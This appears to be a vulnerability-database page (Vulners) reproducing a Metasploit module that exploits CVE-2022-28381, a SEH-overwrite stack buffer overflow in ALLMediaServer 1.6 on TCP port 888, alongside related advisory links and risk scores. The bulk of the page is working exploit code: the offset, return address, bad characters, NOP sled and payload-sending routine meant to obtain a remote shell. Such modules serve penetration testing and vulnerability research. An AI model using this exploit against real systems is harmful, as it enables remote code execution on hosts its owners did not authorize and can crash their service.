Lucene search
K

ALLMediaServer 1.6 SEH Buffer Overflow

🗓️ 05 Apr 2022 17:42:41Reported by Hejap Zairy Al-SharifType 
metasploit
 metasploit
🔗 www.rapid7.com👁 147 Views

ALLMediaServer 1.6 SEH Buffer Overflow exploit targeting ALLMediaServer 1.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ALLMediaServer 1.6 Buffer Overflow Exploit
6 Apr 202200:00
zdt
ATTACKERKB
CVE-2022-28381
3 Apr 202219:15
attackerkb
Circl
CVE-2022-28381
3 Apr 202222:26
circl
CNNVD
Microsoft ALLMediaServer 缓冲区错误漏洞
3 Apr 202200:00
cnnvd
CVE
CVE-2022-28381
3 Apr 202218:30
cve
Cvelist
CVE-2022-28381
3 Apr 202218:30
cvelist
NVD
CVE-2022-28381
3 Apr 202219:15
nvd
OSV
CVE-2022-28381
3 Apr 202219:15
osv
Packet Storm
ALLMediaServer 1.6 Buffer Overflow
4 Apr 202200:00
packetstorm
Prion
Stack overflow
3 Apr 202219:15
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ALLMediaServer 1.6 SEH Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow leading to a SEH handler overwrite
          in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error
          within the handling of a HTTP request. Note that this exploit will only work
          against x86 or WoW64 targets, x64 is not supported at this time.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Hejap Zairy Al-Sharif', # Aka @Matrix07ksa. Remote exploit and Metasploit module
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Payload' => {
          'BadChars' => '\x00\x0a\x0d\xff'
        },
        'Targets' => [
          [
            'ALLMediaServer 1.6',
            {
              'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
              'Offset' => 1072
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2022-04-01',
        'DefaultTarget' => 0,
        'References' => [
          ['CVE', '2022-28381'],
          ['URL', 'https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow']
        ],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN], # If this fails the service will go down and will not restart.
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options([Opt::RPORT(888)])
  end

  def exploit
    connect
    buffer = ''
    buffer << make_nops(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << make_nops(100)
    buffer << payload.encoded
    buffer << make_nops(50)
    print_status('Sending payload to exploit MediaServer...')
    sock.put(buffer)
    print_status('Sent payload...hopefully we should get a shell!')
    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Apr 2026 19:01Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.68733
147